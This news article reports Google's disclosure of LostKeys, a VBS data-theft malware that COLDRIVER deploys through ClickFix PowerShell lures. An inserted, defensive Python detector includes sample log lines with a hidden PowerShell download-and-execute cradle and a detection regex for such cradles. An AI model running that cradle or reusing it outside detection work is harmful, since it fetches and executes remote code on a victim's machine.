Google Uncovers 'LostKeys': New Russian Malware in Action

The world of cyber espionage has just gotten a lot more interesting – and sinister. A new piece of malware, dubbed "LostKeys," has been discovered by Google's Threat Intelligence Group, and it's being used by a Russian state-backed hacking group known as COLDRIVER to spy on Western entities.

COLDRIVER is linked to Russia's Federal Security Service (FSB), which is the country's counterintelligence and internal security agency. This connection has been previously established by the UK and its "Five Eyes" intelligence allies, who have also warned of a potential threat from COLDRIVER.

Google discloses LostKeys, a malware linked to Russia

Google’s Threat Intelligence Group (GTIG) first spotted LostKeys in January. It seems COLDRIVER has been deploying it in very targeted “ClickFix” attacks. Think of these as digital con jobs where they trick people into running dodgy PowerShell scripts.

Basically, ClickFix attacks are based on classic social engineering. Once those scripts are running, they pave the way for even more PowerShell nastiness to be downloaded and executed. The end goal of the chain is the installation of LostKeys, which Google has identified as a Visual Basic Script (VBS) data theft malware.

According to GTIG’s report, LostKeys is like a “digital vacuum cleaner” that extracts specific files and directories. It also sends system information and a list of running processes back to the attackers.
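The chain the article describes (a user-run PowerShell download cradle, more PowerShell, then a VBS payload run by the Windows Script Host) is something a defender can correlate in process-creation telemetry. The following is an added example, not code from the article or from GTIG; the log format, host names, file paths and the 10-minute window are all constructed assumptions for the demo.

```python
# Added example (not from the article or GTIG): correlate process-creation
# events to flag a ClickFix-style chain: PowerShell with a download cradle,
# followed shortly by a .vbs file run via wscript/cscript on the same host.
# Log format, hosts, paths and timings below are constructed for the demo.
import re
from datetime import datetime, timedelta

# Constructed sample events: "time|host|parent_image|image|command_line"
SAMPLE_LOG = """\
2025-01-14T09:02:11|WS-17|explorer.exe|powershell.exe|powershell -w hidden -c "iex (iwr http://example.invalid/a.ps1)"
2025-01-14T09:02:14|WS-17|powershell.exe|powershell.exe|powershell -ep bypass -f C:\\Users\\u\\AppData\\Local\\Temp\\b.ps1
2025-01-14T09:03:40|WS-17|powershell.exe|wscript.exe|wscript.exe C:\\Users\\u\\AppData\\Local\\Temp\\c.vbs
2025-01-14T10:15:02|WS-22|explorer.exe|powershell.exe|powershell -c Get-Process
2025-01-14T11:00:00|WS-09|cmd.exe|wscript.exe|wscript.exe C:\\scripts\\inventory.vbs
"""

# Command-line fragments typical of a PowerShell download/encoded cradle
DOWNLOAD_CRADLE = re.compile(r"iwr|invoke-webrequest|downloadstring|downloadfile|-enc\w*", re.I)
SCRIPT_HOSTS = {"wscript.exe", "cscript.exe"}

def parse_events(text):
    """Turn the pipe-separated log into dicts with parsed timestamps."""
    events = []
    for line in text.strip().splitlines():
        ts, host, parent, image, cmd = line.split("|", 4)
        events.append({"ts": datetime.fromisoformat(ts), "host": host,
                       "parent": parent.lower(), "image": image.lower(), "cmd": cmd})
    return events

def detect_clickfix_chain(events, window=timedelta(minutes=10)):
    """Return (host, cradle_time, vbs_time) for each host where a PowerShell
    download cradle is followed within `window` by a .vbs run via WSH."""
    cradles = [e for e in events
               if e["image"] == "powershell.exe" and DOWNLOAD_CRADLE.search(e["cmd"])]
    vbs_runs = [e for e in events
                if e["image"] in SCRIPT_HOSTS and e["cmd"].lower().endswith(".vbs")]
    hits = []
    for c in cradles:
        for v in vbs_runs:
            if v["host"] == c["host"] and c["ts"] <= v["ts"] <= c["ts"] + window:
                hits.append((c["host"], c["ts"], v["ts"]))
    return hits

if __name__ == "__main__":
    for host, t0, t1 in detect_clickfix_chain(parse_events(SAMPLE_LOG)):
        print(f"ClickFix-style chain on {host}: cradle at {t0}, VBS run at {t1}")
```

Only WS-17 is flagged: WS-22 runs PowerShell without a cradle, and WS-09 runs a VBS file with no preceding download.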

COLDRIVER's usual MO involves stealing login details to pilfer emails and contacts. However, they’ve also been known to deploy another malware called SPICA for grabbing documents and files. LostKeys seems to be serving a similar purpose, but it’s only brought out for those “highly selective cases.” This suggests that it’s a more specialized tool in COLDRIVER's espionage toolkit.

Interestingly, COLDRIVER isn’t the only state-sponsored group dabbling in these ClickFix attacks. The cyber underworld is apparently a fan of this tactic, with groups linked to North Korea (Kimsuky), Iran (MuddyWater), and even other Russian actors (APT28 and UNK_RemoteRogue) all using similar methods in their recent spying campaigns.

COLDRIVER is also known by a few other aliases, like Star Blizzard and Callisto Group. The group has been honing its social engineering and open-source intelligence skills to trick targets since at least 2017. Its targets have ranged from defense and government organizations to NGOs and politicians.

The group’s attacks have been increasing, especially after Russia's invasion of Ukraine, even expanding to defense-industrial sites and US Department of Energy facilities.

US authorities are taking a very serious stance against COLDRIVER. The US State Department has slapped sanctions on a couple of COLDRIVER operatives (one reportedly an FSB officer), and it is currently offering a hefty $10 million reward for any tips that could help track down other members. This reflects how seriously the US is taking the group.